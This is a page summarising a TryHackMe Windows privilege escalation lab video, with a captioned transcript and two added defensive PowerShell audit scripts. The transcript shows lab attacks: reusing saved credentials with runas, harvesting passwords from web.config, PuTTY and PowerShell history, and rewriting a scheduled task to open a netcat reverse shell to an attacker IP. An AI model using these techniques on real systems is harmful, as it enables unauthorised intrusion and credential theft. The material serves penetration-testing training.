Try Hack Me : Windows Privilege Escalation Part 1.
Summary
TL;DR: In this video, the host delves into Windows privilege escalation, an essential skill in the junior penetration testing path. They discuss the common scenario of starting with unprivileged user access and leveraging it to gain administrative rights. Techniques include exploiting misconfigurations, service accounts, and scheduled tasks. The host demonstrates practical methods like using saved credentials and manipulating scheduled tasks for privilege escalation, providing a hands-on learning experience for viewers.
Takeaways
- 💻 The video discusses Windows privilege escalation, a technique used in penetration testing to gain higher access rights on a system.
- 🔄 The presenter acknowledges a delay in content release due to the vast amount of material to cover, emphasizing the importance of continuous learning.
- 👤 Unprivileged user accounts are common initial access points in pen testing, reflecting real-world scenarios where most network users have limited privileges.
- 🔑 Privilege escalation often involves exploiting misconfigurations, service accounts with elevated rights, or vulnerabilities in software or missing security patches.
- 🔍 The video highlights the importance of looking for credentials in various places such as text files, service accounts, and scheduled tasks.
- 📂 Different types of accounts like admin, standard users, and special built-in accounts each have varying levels of access and are potential targets for privilege escalation.
- 🔗 The script explains how service accounts, used for running services, can be a gateway to higher privileges due to their often elevated status.
- 🔎 Techniques for finding and exploiting saved credentials, such as those in PowerShell history or saved Windows credentials, are demonstrated.
- 🛠 The video provides practical examples of how to use command-line tools to check for and manipulate scheduled tasks, which can be abused for privilege escalation.
- 🔄 The concept of 'pivoting' through different accounts to gather various permissions and access is introduced as a strategic approach in pen testing.
- 🔒 The script concludes with a discussion on maintaining elevated privileges post-escalation, suggesting methods like editing the registry or using persistent malware.
Q & A
What is the main focus of the video script?
- The main focus of the video script is Windows privilege escalation, which is a continuation of the junior penetration testing path.
Why is it common to start with an unprivileged user account during a pen test?
- It is common to start with an unprivileged user account during a pen test because, statistically, the majority of users on a network are regular users with limited access, and this scenario represents a realistic starting point for testing.
What are some ways unprivileged users can gain elevated privileges?
- Unprivileged users can gain elevated privileges by exploiting misconfigurations, finding credentials in text files or spreadsheets, or by taking advantage of excessive privileges assigned to their accounts, vulnerable software, or missing Windows security patches.
Why are service accounts significant when looking for privilege escalation opportunities?
- Service accounts are significant because they often have elevated privileges for certain functions, and their passwords are less frequently rotated, making them potential targets for gaining higher access.
What is the difference between a local system account and an administrator user account in Windows?
- A local system account has more privileges than an administrator user account. The system account can perform any action on the local machine, while an administrator user account has elevated privileges but is still limited in comparison.
How can saved Windows credentials be exploited for privilege escalation?
- Saved Windows credentials can be exploited by using the runas command with its savecred option to execute actions or access resources with the saved user's higher privileges, which can aid in privilege escalation.
What is an unattended Windows installation and why is it relevant to privilege escalation?
- An unattended Windows installation is a method used in enterprise environments to deploy a single operating system image across multiple hosts. It is relevant to privilege escalation because admin credentials used in these installations might be stored in files like unattend.xml, which can be exploited if discovered.
How can the history file in PowerShell be used to find credentials?
- The history file in PowerShell can be used to find credentials by reviewing the commands that have been previously executed, which might include commands that used or displayed credentials.
What is the significance of the 'web.config' file in IIS and how can it be exploited?
- The 'web.config' file in IIS stores the configuration of the web server, including database connection strings and authentication mechanisms, which might contain service account credentials. Exploiting these credentials can lead to privilege escalation.
How can scheduled tasks be abused for privilege escalation?
- Scheduled tasks can be abused for privilege escalation by modifying the task to execute a malicious script or command when the task runs, especially if the task is configured to run with higher privileges or as an administrator.
What is the purpose of the runas command in Windows?
- The runas command in Windows allows a user to execute a program with the security privileges of a different user account, which can be used to perform actions that the current user does not have permission to execute.
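A read-only audit of the credential-residue locations the answers above describe (unattended-install files, PowerShell history, IIS web.config connection strings, PuTTY sessions, saved Windows credentials), written for this page as an added PowerShell example and not code from the video or the TryHackMe room. It assumes the .NET 4 Framework64 web.config path named on the page plus the default IIS site root, and it reports where a secret is stored without printing the secret itself.

```powershell
# Added example: report WHERE leftover credentials live, never the secrets themselves,
# so the output is safe to paste into a remediation ticket.
# Assumptions: run as the user being audited (PowerShell history and PuTTY sessions
# are per-user); $WebConfigs holds the .NET 4 path from the page plus the default
# IIS site root and can be extended for other framework versions or sites.

$Findings = New-Object 'System.Collections.Generic.List[string]'

# 1. Unattended-installation answer files (the locations listed in the room)
$UnattendPaths = @(
    "$env:SystemDrive\Unattend.xml",
    "$env:windir\Panther\Unattend.xml",
    "$env:windir\Panther\Unattend\Unattend.xml",
    "$env:windir\system32\sysprep.inf",
    "$env:windir\system32\sysprep\sysprep.xml"
)
foreach ($p in $UnattendPaths) {
    if (Test-Path -LiteralPath $p) {
        # a <Password> element means plaintext or base64 admin credentials may remain
        $hasPwd = Select-String -LiteralPath $p -Pattern '<Password>|AdministratorPassword' -Quiet
        $Findings.Add("UNATTEND   $p (password element present: $hasPwd)")
    }
}

# 2. PowerShell console history: commands that took a password on the command line
$History = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
if (Test-Path -LiteralPath $History) {
    $hits = Select-String -LiteralPath $History -Pattern 'net user .*/add|/user:|password|-AsPlainText'
    if ($hits) {
        # line numbers only; the command text itself would reveal the password
        $lines = ($hits | ForEach-Object { $_.LineNumber }) -join ','
        $Findings.Add("PSHISTORY  $History (suspicious lines: $lines)")
    }
}

# 3. IIS web.config connection strings that embed a password
$WebConfigs = @(
    "$env:windir\Microsoft.NET\Framework64\v4.0.30319\Config\web.config",
    "$env:SystemDrive\inetpub\wwwroot\web.config"
)
foreach ($wc in $WebConfigs) {
    if (-not (Test-Path -LiteralPath $wc)) { continue }
    try { [xml]$xml = Get-Content -LiteralPath $wc -Raw -ErrorAction Stop } catch { continue }
    foreach ($cs in $xml.SelectNodes('//connectionStrings/add')) {
        if ($cs.connectionString -match '(?i)\b(password|pwd)\s*=') {
            $Findings.Add("WEBCONFIG  $wc (connection '$($cs.name)' embeds a password)")
        }
    }
}

# 4. PuTTY sessions with a stored proxy password (what reg query ... /f Proxy surfaces)
$PuttyKey = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path -LiteralPath $PuttyKey) {
    foreach ($session in Get-ChildItem -LiteralPath $PuttyKey) {
        $props = Get-ItemProperty -LiteralPath $session.PSPath
        if ($props.PSObject.Properties['ProxyPassword'] -and $props.ProxyPassword) {
            $name = [uri]::UnescapeDataString($session.PSChildName)   # PuTTY URL-encodes names
            $Findings.Add("PUTTY      session '$name' stores ProxyPassword for '$($props.ProxyUsername)'")
        }
    }
}

# 5. Saved Windows credentials: cmdkey /list shows the targets, and any process running
#    as this user can reuse them with runas /savecred without knowing the password
$targets = cmdkey /list 2>$null | Select-String -Pattern '^\s*Target:'
foreach ($t in $targets) {
    $Findings.Add("CMDKEY     $($t.Line.Trim()) (remove with cmdkey /delete:<target>)")
}

if ($Findings.Count -eq 0) { 'No credential residue found in the audited locations.' }
else { $Findings }
```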
Outlines
💻 Introduction to Windows Privilege Escalation
The video begins with an introduction to Windows privilege escalation, a topic that continues from the presenter's junior penetration testing path series. The presenter acknowledges the delay in content release due to the vast amount of material to cover. The focus is on escalating privileges on a Windows machine, starting from an unprivileged user account, which is common in enterprise environments during penetration testing. The video aims to cover up to task five or six due to the complexity of the content and the desire to ensure viewer comprehension. The importance of understanding privilege escalation is emphasized, as it is a realistic scenario where an attacker may start with limited access and aim to gain administrative control.
🔍 Exploiting Unprivileged User Access
This section delves into the concept of exploiting the limited access granted to unprivileged users. It discusses the common scenario where penetration testers begin with a regular user account and the necessity to escalate to administrative privileges. The video highlights the importance of service accounts, which often have elevated privileges and are frequently overlooked due to their nature of being used for specific services. The presenter also mentions the potential for privilege escalation through misconfigurations, excessive privileges assigned to accounts, and vulnerable software or missing security patches.
🔑 Harvesting Passwords and Exploiting Saved Credentials
The third paragraph discusses techniques for harvesting passwords and exploiting saved credentials on a Windows system. It covers the process of looking for credentials in text files, spreadsheets, and service accounts, which can be a pathway to higher privileges. The video also explains how to use the 'runas' command to execute tasks with different user privileges and how to list and potentially utilize saved credentials on the system. The presenter demonstrates how to use the 'cmdkey' command to list and potentially exploit saved credentials, which could lead to privilege escalation.
🕵️‍♂️ Investigating IIS Configurations and Leveraging Saved Credentials
This part of the video focuses on investigating Internet Information Services (IIS) configurations for stored passwords and authentication mechanisms. It explains how to find and exploit 'web.config' files that may contain sensitive information like database connection strings and service account credentials. The presenter also revisits the use of saved credentials with the 'runas' command to access files and resources that may require higher privileges. The video demonstrates how to pivot through different accounts to gather various permissions and access sensitive data.
🔄 Exploring Scheduled Tasks for Privilege Escalation
The fifth paragraph explores the use of scheduled tasks as a vector for privilege escalation. It explains how scheduled tasks can be executed with higher privileges and how an attacker might manipulate these tasks to run malicious code with elevated permissions. The video demonstrates how to query and potentially overwrite a scheduled task to include a reverse shell command, which, when executed, would provide the attacker with administrative access. The presenter also discusses the importance of checking the permissions of the current user to determine if they can modify or overwrite the task in question.
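To check a host for the weakness this paragraph describes, here is an added PowerShell audit (not code from the video or the room) that generalizes the icacls check on schtask.bat across every scheduled task: it lists tasks whose action file, or a script passed in the action's arguments, can be modified by a low-privileged principal. It relies on the built-in ScheduledTasks module (Windows 8 / Server 2012 and later); the identity list and file-extension pattern are assumptions to adjust.

```powershell
# Added example: find scheduled tasks whose "Task To Run" file (or a script passed in
# its arguments) can be modified by a low-privileged principal. Whatever account the
# task runs as will then execute that principal's code, which is the weakness the
# vulntask / schtask.bat walkthrough shows. Read-only: nothing is changed.
# Assumptions: ScheduledTasks module present; identity list and extensions are a
# starting point, not a complete policy.

# Principals that should never hold write rights on a file a privileged task executes
$LowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    "$env:USERDOMAIN\$env:USERNAME"      # the account running this audit
)

# Rights that let a principal change the file or its ACL: icacls F, M and W all
# include these, plus the GENERIC_WRITE / GENERIC_ALL bits some ACEs carry.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'Write, ChangePermissions, TakeOwnership'
$WriteMask = $WriteMask -bor 0x40000000 -bor 0x10000000

function Get-TaskFiles {
    # Returns rooted paths for the action's executable and any script named in its
    # arguments, e.g. "cmd.exe /c C:\tasks\schtask.bat" yields the .bat file.
    param($Action)
    if ($Action.CimClass.CimClassName -ne 'MSFT_TaskExecAction') { return @() }
    $files = @()
    if ($Action.Execute) {
        $files += [Environment]::ExpandEnvironmentVariables($Action.Execute.Trim('"'))
    }
    if ($Action.Arguments) {
        $ext = '(?:bat|cmd|ps1|vbs|js|exe|dll)'
        foreach ($m in [regex]::Matches($Action.Arguments, "`"[^`"]+\.$ext`"|\S+\.$ext\b")) {
            $files += [Environment]::ExpandEnvironmentVariables($m.Value.Trim('"'))
        }
    }
    # Bare names such as cmd.exe resolve through PATH and are not checked here
    $files | Where-Object { [System.IO.Path]::IsPathRooted($_) } | Select-Object -Unique
}

function Get-WritableBy {
    # Returns the low-privileged identities that hold write-class rights on $Path
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { $ace.IdentityReference.Value }
    }
}

$Results = foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    $runsAs = $task.Principal.UserId
    if (-not $runsAs) { $runsAs = $task.Principal.GroupId }
    foreach ($action in $task.Actions) {
        foreach ($file in Get-TaskFiles -Action $action) {
            if (-not (Test-Path -LiteralPath $file -PathType Leaf)) { continue }
            $writers = @(Get-WritableBy -Path $file)
            if ($writers.Count -eq 0) { continue }
            [pscustomobject]@{
                Task       = $task.TaskPath + $task.TaskName
                RunsAs     = $runsAs
                RunLevel   = $task.Principal.RunLevel
                File       = $file
                WritableBy = ($writers -join ', ')
            }
        }
    }
}

# A row where RunsAs is SYSTEM, an administrator or a service account and WritableBy
# lists Users or Everyone is the escalation path; fix it with icacls /remove or by
# moving the script to a directory only administrators can write.
$Results | Sort-Object RunsAs | Format-Table -AutoSize
```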
🏁 Maintaining Elevated Access with Registry Manipulation
The final paragraph covered in this session discusses methods for maintaining elevated access once it has been achieved. It touches on the use of registry manipulation to ensure persistent access even after the system is restarted. The video shows how to create a malicious MSI file using 'msfvenom' and how to set up a listener for the reverse shell. It also mentions the need for further steps to ensure the elevated access is not lost, such as editing the registry or setting up additional scheduled tasks. The presenter concludes by acknowledging the complexity of the topic and the need for adaptability when applying these techniques in different scenarios.
Keywords
💡Privilege Escalation
💡Penetration Testing
💡Unprivileged User
💡Service Accounts
💡Scheduled Tasks
💡Windows Credential
💡PowerShell
💡mike.katz
💡Web.config
💡PuTTY
💡Registry
Highlights
Introduction to Windows privilege escalation techniques for junior penetration testers.
Explanation of the common scenario where testers start with unprivileged user access in enterprise environments.
Discussion on the importance of understanding service accounts due to their elevated privileges.
Overview of different types of user accounts, including standard users and administrators.
Advantage of targeting service accounts for potential privilege escalation.
Techniques for finding credentials in text files and spreadsheets.
The significance of looking for misconfigurations in services and scheduled tasks.
How to exploit vulnerable software and missing Windows security patches for privilege escalation.
Tutorial on harvesting passwords from usual spots like unattended Windows installation files.
Method to retrieve credentials from PowerShell history files.
Step-by-step guide on accessing saved Windows credentials using cmdkey /list.
Exploration of extracting passwords from IIS configurations stored in web.config files.
Technique to retrieve credentials from software like PuTTY by querying the Windows registry.
Demonstration of using saved credentials to access restricted files and escalate privileges.
How to modify scheduled tasks to run malicious code at system startup for persistent access.
Practical example of editing a batch file associated with a scheduled task to include a reverse shell.
Final step of maintaining elevated privileges by editing the Windows registry.
Conclusion and preview of the continuation in the next video, covering tasks five to eight.
Transcripts
[Music]
[Applause]
yo what's going on guys welcome back
today we are doing Windows privilege
escalation this is um a continu
continuation excuse me of the junior pen
testing path and we're going to keep
finishing it up I know it's been a while
since I posted on this but there's just
so much content out there that I'm
trying to get to you guys as fast as I
can but we're going to go ahead and dive
into it so this is just Windows
privilege escalation so once we take
over Windows machine so you can see we
have this Windows machine here it's very
slow and that's fine so it might take us
a little bit and we're probably not
going to get through all of it today
because I want to make sure you guys
understand so we'll probably get to task
five or six and then we'll stop there so
first things first during a pen test you
will often have access to Windows host
with an unprivileged user this is true
so it's almost always going to be when
you um are on Enterprise environment
during pen testing you're probably going
to a regular user account first that's
just the way it is because I mean if you
think about statistically speaking the
majority of users on a network are
regular unprivileged users so
statistically you're most likely to get
them so just think of it that way yes by
all means if you can get an admin
account right off the bat go for it
don't waste your time with all this but
that's not realistic to do in every s
situation you need to know how to do
this so unprivileged users hold limited
access including files folders and no
means perform admin tasks true but we
can take advantage of what they do have
access to to get that admin permissions
so let's go a and dive into it if you
guys like this content if you guys are
enjoying the video hit that like button
hit the sub button helps me tremendously
grow and I appreciate everything you
guys do for me so here we go so simply
put privilege escalation I'm not going
to read the definition but consists of
using given access to a host with user a
so basically what they're saying is I
have access to user a and now I can gain
access to user B which has higher
permissions right um so that would be an
admin in this case or that's what we're
the goal is right the all long-term goal
or the overall goal is a domain admin um
but we don't need to dive too deep into
that here this is just privilege
escalation so gaining access to differ
account different accounts can be as
simple as finding credentials and text
files spreadsheets this is true the one
thing I don't think um they cover very
much they don't cover uh service
accounts and service accounts usually
have elevated privileges at least for
certain functions and so I wish they
covered it more but those are something
you should look for when you're doing a
pen test always always always is service
accounts because they are very hard to
rotate passwords for one for two they
also um typically have like I said have
elevated privileges at least for that
function that's it's doing and then for
three it's less likely that people are
going to be watch like weirded out by
that ser service account logging into
other machines because it is a service
account if you're not familiar with what
a service account is um basically it's
an account that you use to run a service
on a machine so if I needed to connect
this machine over to this machine and I
need to do it regularly using an
application or something I will use a
service account so that way it's not
logging in using my account it's not
logging in using your account it's using
an account specific to that service so
gaining access to different accounts can
be as simple as finding them in a text
file which is true it's actually not
uncom common um misconfigurations on
services or scheduled tasks that's how
these are the ones we're going to um
abuse excessive privileges assigned to
the account vulnerable software which is
always known missing Windows security
patches also so before jumping into the
techniques let's look at the different
types of accounts so you have your
admins this is your regular admin right
like this has elevated privileges they
can change system configuration
parameters and access files so yeah we
know what an admin is I don't need to
explain to you your standard users these
are people that can log into the machine
and do standard activity they can look
at things they can do stuff but they
can't do any admin tasks okay any user
with the administrator privileges will
be part of the admin group on the other
hand standard users are part of the user group
keep in mind what they're talking about
here is not is not domain joined meaning
these are accounts that are just default
on Windows when you get into an
Enterprise level pen testing situation
what you're looking at is there will be
multiple groups it won't just be
standard users admins there be
everything in between there'll be people
with a lot of permissions but they don't
have admin right those are still people
that you want to get those are still
targets because they might have access
to a lot more stuff but they're just not
considered a full admin so those are
keep that in mind that when you need to
learn active directory and users of
groups um organizational units and
everything like that because that's
where you start to see the elevated
privileges where you may not get a full
domain admin but you're still getting
elevated privileges
now any user with administrative
privileges will be the administrator
group right so these are local users
that's what we're talking about here
local we're not talking about on a
domain in addition to that you will
usually hear about some special built-in
accounts used by the operating system
okay so they are talking about excuse me
here they are talking about domain
joined they just are only breaking them
down as two types which isn't the case
um yeah it's not the case because there
will be everything in between that there
will be standard users that are maybe
help desk that have elevated privileges
they can change things in active
directory that doesn't mean they're a
full domain admin right so just keep
that in mind um the system the local
system accounts these are accounts that
are just local to the machine meaning it
can only log into that machine it can't
log into all the machines on the domain
but it has full access um so the system
itself will you'll see it all the time
in the logs the system itself will run
when it's doing Windows tasks right when
when your system comes by default it's
going to have these the system account
and it's running all the time right
that's that's just normal activity that
is it's going to be using the system
itself to run tasks and that's the
account it's using the local service
default account to run Windows services
with minimum privileges so this is if
you need to run it without admin
privileges if you have a task that
Windows needs to run but not run as
admin if you've ever ran something and
it says like uh don't doesn't have
permissions or something and then you
run it as admin and it works that's the
difference um network service default
account used for um to Windows services
with minimum privileges it will use
computer credentials there you go so it
will use the basically the account will
use the computer's credentials to
authenticate through a network so pretty
self-explanatory now users that can
change system configurations that's
admin the system account oh sorry the
system account has more privileges than
administrator user aye or nay I don't
think aye is maybe that's just a UK thing
because I think TryHackMe is from UK but
um aye or nay or but anyway um so aye so yes
they it does and the reason is it's the
system it can do whatever it wants right
it is the system so that's why when you
try to take over a machine typically
with like a meterpreter shell or
something you want to get system access
even if you have an admin account system
access is always has more okay so now
harvesting passwords from usual spots so
this is where you're going to whoops
excuse me this is where you're going to
look for and this is the the machine
that started right here so okay
unattended Windows installation when
installing and this is this actually is
very common but you guys have to if you
work never worked in um an Enterprise
environment or any um Network
environment like this then this might be
foreign to you when installing Windows
on a large number of hosts admins use
Windows deployment Services okay so they
put an image out there right and that
image sits out there and when it does
they basically say hey image this
machine or image all these machines with
a new image or whatever and it has that
image sitting out there where it can
grab it right that's the whole point so
which allows for single operating system
image to be deployed through several hosts so
you can store this image it knows where
to reach them everybody can grab them
and it will start installing the image
if you don't know when I say image
because I know that some of you may it
may be new to you that means the
security posture the way Windows is set
up if you set up windows in a specific
way meaning you download it you have all
your applications for your company you
have all of your um different local
admin accounts that you need you have
your break glass accounts those types of
things you have everything set up the
way you want you then take a snapshot an
image of that and you say this is how I
want every machine set up and then you
can push that to everybody that's what
they're doing here now these kinds of
installations are referring to un
unattended installations meaning
nobody's sitting there doing anything
the user doesn't have to log in you can
just push this to people right or you
can have it set up and then when you
plug a new computer in and and join in
the domain it will pull that image okay
such installations require the use of an
admin account which is true which might
end up being stored in the machine in
the following locations so you can see
unattend.xml Panther unattend system32
sysprep the reason these are
stored there is because it has to use
admin credentials and this is unattended
meaning I don't want to have to type in
my credentials every time for every
person so I store them so it can go grab
them later right so as part of these
files you might encounter these so you
can actually go look for these if you
have access to that machine pretty
interesting it's a pretty good way to
look for it especially if you know the
machine has been sysprepped that's what
it's called sysprep is when you're
Imaging the
machine when I say that it means you're
grabbing that snapshot okay whenever a
user runs a command using PowerShell it
gets stored into a file that keeps
memory this is a history file right bash
has the same thing you can type history
on bash and you can see they're going to
go ahead and do this the reason they do
this that you look for the history is
because there's a lot of times when
running commands that you have to put
your credentials in to run that command
on another machine or something and if
you don't hide it meaning you don't have
it as a secure credential or something
like that it will just show it it'll
display
it um okay saved window Windows
credentials Keys Windows allows users to
use other users credentials which we
know this functional also gives option
to save these credentials on the system
so cmdkey /list will actually do
that so what that means is you can save
credentials so that you can run like
let's say you had a service account and
you need to run a task as that service
you can save those credentials well here
you can list them while you can't
actually see the passwords if you notice
the credentials worth trying if you
notice any credentials worth trying
excuse me um you can use them with run
as command and savecred option so
what that means is here you won't see
the credential like you you'll see the
username but you won't see the password
but if you know Windows you can run as
what that means is I can run the command
as the user that they said I have in
question so I'll show you what I
mean so I don't I haven't um done this
box in a long time so I don't remember
but if they actually have one here but
we'll
try we'll try and make this a little bit
bigger for you
guys that way you can see it we'll make
it 36 see how if that's too big okay so
what we're going to do is we're going to
type
cmdkey /list and see if there is a list
of keys currently stored
credentials it looks like we have user W
privilege escalation mike.katz so what
we could do is we could say runas
/savecred
right and then we could say
/user and that user would be this W priv
escalation
one and we'd say and you may not have to
put the domain there so mike.katz and
it should CM so we're going to run
cmd.exe
and look at that so we actually ran a
new command shell and you can see up
here running as mike.katz so I'm
actually able to run now shell as this
new user because they saved the
credential there so that's actually
pretty interesting so that's one way to
look for for credentials as well IIS
configurations if you don't know what
IIS is if you've heard of Apache
anything like that IIS is the um way
that Microsoft runs their web servers so
it's a web server is all it is but you
can see internet Information Services is
the default web server the configuration
of the IIS is stored on a file called
web.config so if you can find that
web.config it can store passwords for
that database and configured
authentication mechanisms meaning there
might be service accounts in there so
you can see here here's a a quick way to
find database connection strings on um
the file so one thing to keep in mind
that I see all the time with people that
do ctfs is they run into this situation
where they they think that I have to go
straight here to admin here to admin
what you can do and what you should be
doing is looking at doing things like
running this command for instance
starting up a cmd.exe right using
mike.katz well mike.katz might have more
permissions than we do we might not have
had permissions to access the IIS file
but now we might have permissions to
access that IIS file so now we can do
this and I don't know if this is
actually if they have it on this m
machine or not
but why is this not
uh okay so it didn't copy and paste but
so then you would run the type Command
right and we'd say type
C:
Windows
Microsoft.NET
Framework64 let's see yep it does
actually have it so v4.0.30319
Config web.config and if a little trick if you
don't know if something exists just try
and tab it and if it finishes it you
know you're good and then you just say
findstr and connection
String and we hit enter do the same
thing and I think you have to capitalize
the S and see if it finds
it okay and there it found it right so
you can see here's the user ID and
here's the password so we actually were
able to pull the IIS configuration but
the key here is you may have to Pivot
through a lot of accounts to get
different permissions right to gather
different things so if there's an IIS
server maybe I can't grab the IIS logs
maybe I don't have permission to access
those but we then use the save
credentials mike.katz we then can access
the IIS credentials and things like that
so make sure you're pivoting around and
messing with it don't just think you
have to go from here to here right it's
not a straight jump all the time okay so
now you can retrieve credentials from
software from PuTTY so PuTTY is an SSH
client and you can see here what they're
doing is they're um querying the registry
and they're asking in for the software
PuTTY and they're looking at the
sessions so what they're doing is and
we'll just do it again with mike.katz
actually we'll do it with the regular so
you can see it because I made it
bigger they're just saying okay registry
we want to query the registry and we
want to say HKEY if you didn't know the
registry is is
basically every file in the in the M um
system it's kind of like how L Linux
excuse me um how Linux everything's a
file when Windows is the same way just
it's a registry key and it's got a
whoops it's got a binary one or zero
true or
false okay PuTTY
sessions /f and we'll say proxy so we're
looking for the proxy s all right we hit
enter and you can see we're getting the
S the um PuTTY sessions and look one of
them's called my SSH server when we do
that look at the name thom.smith
CoolPass2021 so right away we've gotten
mike.katz's account we've got this one
here we ended up getting the um the one
for IIS as well so we've gotten a bunch
of usernames just from kind of changing
our tactics around right now a password
for the julia.jones user has been left
on the PowerShell history what is the
password so let's go back and let's look
at what the here we go console history
so we need to go and get the history
so we say Okay type and type just opens
a file so if you're wondering we say
type and we say user
profile and we're going to say app
data app
data
roaming
Microsoft uh let's see did I mess
something up because it's not tabing but
that's all right user profile no should
be good Microsoft
Windows
PowerShell PSReadline
ConsoleHost_history.txt
change that see even though actually
Windows is not case sensitive and you
can see here's the last things ran on
PowerShell who but we ran ls whoami
whoami /priv whoami /groups and you
can see they added a user on the domain
controller named julia.jones password
zuper cret pass okay so we say Z CR pass
boom we got past it okay so now we say
a web server is running on the remote
host find any interesting passwords on
the web config file well we already did
that we did that in mike.katz's
um one so that's why I'm not going to do
it again but we did that on mike.katz
already so we got that password and then
there is a saved password on your
windows credential on your windows
credentials excuse me using cmdkey
and runas spawn a shell for mike.katz and
retrieve okay so we already did
that so now we just got to retrieve the
flag from his desktop because we're not
able to access that without it so now we
say
CD and we'll go
C
users mike.katz
desktop and then we say dir because
there's no LS which is kind of funny
that there was no LS it says it's not um
recognized but then the history shows
that there was LS ran that's kind of
actually funny I just thought about that
and then we say type flag.txt
then THM what is my password there it is
you can see the first one is PowerShell
is LS on the history which is kind of
funny like I said because LS is not part
of it supposedly
um but that's because this version just
doesn't have it okay um but I guess okay
I never mind I correct myself because
this is the PowerShell history I'm using
command prompt that's on me I wasn't
paying attention all right so now let's
retrieve the password stored in the
saved putty session well we just did
that too and that's right here CoolPass2021
all all right so let's keep going
so now we've got other quick wins so now
schedule tasks so this is actually
something that you should be doing on
Windows Linux everything looking at
scheduled tasks so we're going to say
schtasks /query and what these are
is they are just tasks that they someone
scheduled and said hey I want these to
basically um run at whatever time I tell
it or however often I tell it or
whatever right so we want to say okay we
need to
get a list of the scheduled tasks right
but we don't want to search through all
of them so we're looking and it looks
like it's at system startup for one but
you can see we already knew the name the
name of it was vulntask so that's why we
put vulntask in there we searched for
vulntask so it's kind of cheating
because we knew the name of it and you
would have to look normally but we're
looking and we're trying to see what
kind of users can we get right scheduled
task can be listed from the command line
da da da da okay you'll get lots of
information about the task for us the
Task To Run parameter which
indicates what gets executed by the
scheduled task so this is what's
important you see how it says C:\tasks\
schtask.bat it's a batch file if we
can manipulate that file if we can edit
it then when the schedule task runs it
runs our file whatever we want right so
that's one way to elevate privileges
right there and you can see it starts at
at system startup so if we could if we
could get this to run right we could or
if we could edit that we could edit it
and you notice it runs as admin we can
edit that to instead of do whatever it
does now do a reverse shell to us
restart the system and it would
automatically connect to us every time
it restarted and nobody would know right
now there might be some detection that
pops up but still okay so now you can
see if our current user can modify or
overwrite the task yep and you can see
here we have to check permissions so we
use and you can see we used um IAL ials
which is I believe part of this is
internal Street I could be wrong on that
it might just be default um so now you
say tasks and we already know the the
path right because it just gave it to us
so it's scheduled task.
bat okay and you can see n Authority
system okay so right here built-in users
has I and F and you can see here F has
full access so that means we have full
access to it so this means we can modify
it so we could easily say we want it to
be a net cat shell and then we want it
to and then we could just start the
system and then boom because if you
notice it runs as as a administrator we
now have ad administrator access so
that's how you do
And you can see here, all you have to do is say echo C:\tools, because they've already added netcat on here, and cmd.exe, and they're saying run the scheduled task for us, or they're saying, I'm sorry, no they're not, they're saying echo this as the actual script. And then let's see what the task says, does it need to do it? Uh, yeah, I think we do need to actually do it, so let's go ahead and do this one. So we're just going to say the same exact thing, echo, because we're going to edit it, right. We're going to say C:\tools, and if you don't know, Windows is not case sensitive, so don't stress about the case sensitivity, the netcat exe, -e cmd.exe. So all we're doing is saying netcat, run and execute cmd.exe, and then our IP address is right here. Let me open this up, get the IP: 10.10.45.84. And then we'll say, where was it, there we go, we're going to use the same port, 4444, just because we know it's not in use, but normally I wouldn't use that because that's the default Meterpreter port and that will be blocked by most companies. Then > C:\tasks\schtask.bat. Okay, so we should be able to, here we're actually completely overwriting it.

Okay, so now we have to go back here, we have to start up a netcat listener, so we'll say nc -lvnp 4444. Okay, so now that's listening. Now we just go back here and we have to run the new scheduled task that we just created, or, we didn't create a new one, excuse me, the one we edited. So schtasks /run, and then it's called vulntask. We run it, "attempted to run", it says successful but it says attempted. Okay, and look at that, we have a shell and we have full elevated permission.
So whoami. Why does that look weird? That looks weird, I don't know why it looked weird the first time. So you can see here we're taskusr1, okay, interesting. The reason that's interesting is because I actually thought we would get full admin permissions, but maybe I looked at it wrong. Okay, so taskusr1 was expected, I wonder if I looked at it wrong. Maybe I didn't even notice that taskusr1 was the one running it. Oh, that's the author I was looking at, wrong, yep, that's the author; taskusr1 is who's running it. Okay, so that's on me, I looked at it wrong, but that's good to know. So now we have this full shell, right, so now we can stay here and now we have whatever we need, which is: what is taskusr1's flag? So we can say cd, whoops, cd C:\Users, and then cd taskusr1, and then cd Desktop, and then we can say cat flag.txt, and okay, type flag.txt, and THM task completed, there we go. So we actually did that task, no problem.
Now here you can see how we're going to always stay elevated. So what they're doing is they're actually editing the registry, excuse me, so you can see this method requires two registry values to be set. So we need to set these first, we're querying them, right, and then we're actually creating a malicious .msi. Here we're creating that msfvenom reverse shell, and then here we're actually putting it right in the temporary directory. You should also run the multi/handler module configured accordingly. Once you have transferred the file you've created, you can run the installer with the command below and receive the reverse shell. So you can see this will actually go ahead and make sure that these are set. Now, does this work currently? I will tell you it probably won't, because it'll probably be busted, but there's ways around that. I'm just saying this is a good example of how to stay always elevated: you can change a registry edit, you can make another scheduled task, you could do all kinds of things to stay elevated as that user once you have that user's configuration.

All right, I was going to try to get to task five, but I think we're going to stop there. Let's see how long, yeah, it'll take us a little bit to get to task five, let's see, yeah, this is a long one, so I'm going to stop there. That's 30 minutes, that's good. We'll finish task five, six, seven and then eight next time, because then that's it; tools of the trade, there's no actual questions, so that'll be it. So hopefully this helps you guys, hopefully you guys are following along in this path, the junior pen testing path, and learning something, because a lot of these are very rudimentary and you might say they don't work anymore. They do, it's just you have to manipulate them in a way, you have to understand the technical aspects, and understand that, yeah, it might not work where I run just that msfvenom payload that they laid out for me, but if I can change things I can make it work for me. So hopefully this helps you guys, and hopefully you guys like this path. Let me know if you do, and thank you, have a good day.
